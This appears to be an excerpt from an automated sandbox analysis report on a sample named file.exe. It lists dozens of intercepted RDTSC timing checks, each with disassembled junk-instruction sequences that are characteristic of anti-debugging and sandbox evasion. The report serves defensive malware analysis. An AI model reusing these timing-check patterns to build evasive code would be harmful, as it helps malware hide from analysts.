                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121AC33 second address: 121ACA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCB968CCh 0x00000007 pushad 0x00000008 jmp 00007F7ADCB968D9h 0x0000000d jmp 00007F7ADCB968D8h 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jl 00007F7ADCB968E1h 0x0000001d jne 00007F7ADCB968C6h 0x00000023 jmp 00007F7ADCB968D5h 0x00000028 js 00007F7ADCB968C8h 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121ACA1 second address: 121ACA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121AF1C second address: 121AF44 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7ADCB968C6h 0x00000008 jbe 00007F7ADCB968C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F7ADCB968D8h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121AF44 second address: 121AF4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121AF4A second address: 121AF4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121AF4E second address: 121AF52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121B0A2 second address: 121B0A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121B0A8 second address: 121B0AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1220D34 second address: 1220D3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1220D3A second address: 1220D52 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7ADCEF9146h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jno 00007F7ADCEF914Ch 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121F6D0 second address: 121F6E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F7ADCB968C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121F6E0 second address: 121F6E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121FAE3 second address: 121FAE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121FAE7 second address: 121FB05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F7ADCEF9151h 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121FC97 second address: 121FCE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F7ADCB968D5h 0x0000000b push edi 0x0000000c jmp 00007F7ADCB968D9h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 pop edi 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F7ADCB968D2h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C8096 second address: 11C812A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCEF914Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F7ADCEF914Ah 0x00000010 jg 00007F7ADCEF915Ch 0x00000016 popad 0x00000017 nop 0x00000018 mov edx, dword ptr [ebp+122D1A5Ah] 0x0000001e mov ebx, dword ptr [ebp+1247903Eh] 0x00000024 push 00000000h 0x00000026 push eax 0x00000027 call 00007F7ADCEF9148h 0x0000002c pop eax 0x0000002d mov dword ptr [esp+04h], eax 0x00000031 add dword ptr [esp+04h], 0000001Ch 0x00000039 inc eax 0x0000003a push eax 0x0000003b ret 0x0000003c pop eax 0x0000003d ret 0x0000003e movsx edx, cx 0x00000041 add eax, ebx 0x00000043 call 00007F7ADCEF9151h 0x00000048 mov ecx, dword ptr [ebp+122D2964h] 0x0000004e pop ecx 0x0000004f mov edx, dword ptr [ebp+122D2A59h] 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b pop eax 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C812A second address: 11C8130 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C8130 second address: 11C8136 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C8136 second address: 11C813A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C813A second address: 11C8175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jo 00007F7ADCEF914Ch 0x00000011 add dword ptr [ebp+122D1B7Eh], edi 0x00000017 push 00000004h 0x00000019 movsx edx, si 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push esi 0x00000021 pop esi 0x00000022 jmp 00007F7ADCEF9158h 0x00000027 popad 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121FE63 second address: 121FE81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 jmp 00007F7ADCB968D3h 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1220A77 second address: 1220A91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCEF914Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F7ADCEF914Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1223B4F second address: 1223B69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 jmp 00007F7ADCB968D1h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1223B69 second address: 1223B6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122353D second address: 1223543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1223543 second address: 1223565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jmp 00007F7ADCEF9158h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1223891 second address: 12238A5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7ADCB968C6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007F7ADCB968C8h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12238A5 second address: 12238AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1229D9B second address: 1229DD8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7ADCB968C6h 0x00000008 jmp 00007F7ADCB968D4h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnl 00007F7ADCB968D7h 0x00000015 jo 00007F7ADCB968CCh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122A39A second address: 122A3A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122A69E second address: 122A6A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122A6A2 second address: 122A6A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122ABAE second address: 122ABC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F7ADCB968CAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122ABC1 second address: 122ABC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122F707 second address: 122F726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F7ADCB968CFh 0x0000000a jc 00007F7ADCB968E4h 0x00000010 push eax 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122ED4F second address: 122ED5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122EEBC second address: 122EEC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122EEC0 second address: 122EECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122EECA second address: 122EED0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122EED0 second address: 122EED4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122F00A second address: 122F036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7ADCB968D4h 0x00000009 jmp 00007F7ADCB968CBh 0x0000000e popad 0x0000000f js 00007F7ADCB968CCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122F1A1 second address: 122F1AD instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7ADCEF914Eh 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122F3FD second address: 122F40C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F7ADCB968C6h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122F40C second address: 122F416 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7ADCEF9146h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1230CB2 second address: 1230CB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123D8AF second address: 123D8C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 ja 00007F7ADCEF9146h 0x0000000c push edx 0x0000000d pop edx 0x0000000e popad 0x0000000f jnp 00007F7ADCEF914Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123D8C6 second address: 123D8D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jno 00007F7ADCB968C6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123D8D4 second address: 123D8D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123D8D8 second address: 123D8DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123DE6A second address: 123DE6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123DFD5 second address: 123DFF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCB968CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push ecx 0x0000000b pushad 0x0000000c jmp 00007F7ADCB968CDh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123E162 second address: 123E17D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7ADCEF914Bh 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d jl 00007F7ADCEF914Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123EEC8 second address: 123EECC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123EECC second address: 123EEFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F7ADCEF9146h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F7ADCEF914Eh 0x00000012 jmp 00007F7ADCEF914Fh 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a pop eax 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123EEFB second address: 123EF12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCB968CDh 0x00000007 jne 00007F7ADCB968D2h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123CEF9 second address: 123CEFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12536E7 second address: 12536EC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12558D4 second address: 12558E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCEF914Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125BBE4 second address: 125BBF2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F7ADCB968C6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125BBF2 second address: 125BBFC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7ADCEF9146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125BBFC second address: 125BC08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007F7ADCB968C6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125BC08 second address: 125BC1C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007F7ADCEF9176h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125BC1C second address: 125BC20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1264687 second address: 126468D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126468D second address: 12646A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCB968D1h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12646A4 second address: 12646AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12646AA second address: 12646AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126451B second address: 1264525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F7ADCEF9146h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1264525 second address: 1264534 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F7ADCB968C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1264534 second address: 1264539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126D15D second address: 126D161 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126D2C5 second address: 126D2DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCEF914Eh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126D5EA second address: 126D5EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126D765 second address: 126D76F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7ADCEF914Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126E4B6 second address: 126E4E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F7ADCB968C6h 0x0000000a pop eax 0x0000000b pushad 0x0000000c jng 00007F7ADCB968C6h 0x00000012 jmp 00007F7ADCB968D6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127230B second address: 127231D instructions: 0x00000000 rdtsc 0x00000002 jp 00007F7ADCEF9146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F7ADCEF9146h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127231D second address: 127234B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCB968D3h 0x00000007 jmp 00007F7ADCB968D7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127234B second address: 1272355 instructions: 0x00000000 rdtsc 0x00000002 js 00007F7ADCEF9152h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1272355 second address: 127235B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127235B second address: 1272362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1271DF1 second address: 1271DFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 ja 00007F7ADCB968C6h 0x0000000c pop ecx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1271DFE second address: 1271E08 instructions: 0x00000000 rdtsc 0x00000002 js 00007F7ADCEF9152h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1271E08 second address: 1271E1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F7ADCB968C6h 0x0000000a pushad 0x0000000b je 00007F7ADCB968C6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127518A second address: 12751E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCEF9159h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jp 00007F7ADCEF914Eh 0x00000011 push esi 0x00000012 jmp 00007F7ADCEF9157h 0x00000017 pushad 0x00000018 popad 0x00000019 pop esi 0x0000001a jc 00007F7ADCEF9148h 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushad 0x00000025 popad 0x00000026 pushad 0x00000027 popad 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12751E3 second address: 12751EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007F7ADCB968C6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1282AF4 second address: 1282B0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCEF9156h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1290785 second address: 12907B0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c jmp 00007F7ADCB968D3h 0x00000011 pop edx 0x00000012 jmp 00007F7ADCB968CBh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1292F8E second address: 1292F99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1292F99 second address: 1292F9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A3CB4 second address: 12A3CD4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCEF9158h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A3CD4 second address: 12A3CDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A3CDA second address: 12A3CDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A3CDE second address: 12A3CE4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A2FB9 second address: 12A2FE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCEF9155h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007F7ADCEF9148h 0x0000000f popad 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A2FE0 second address: 12A2FE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
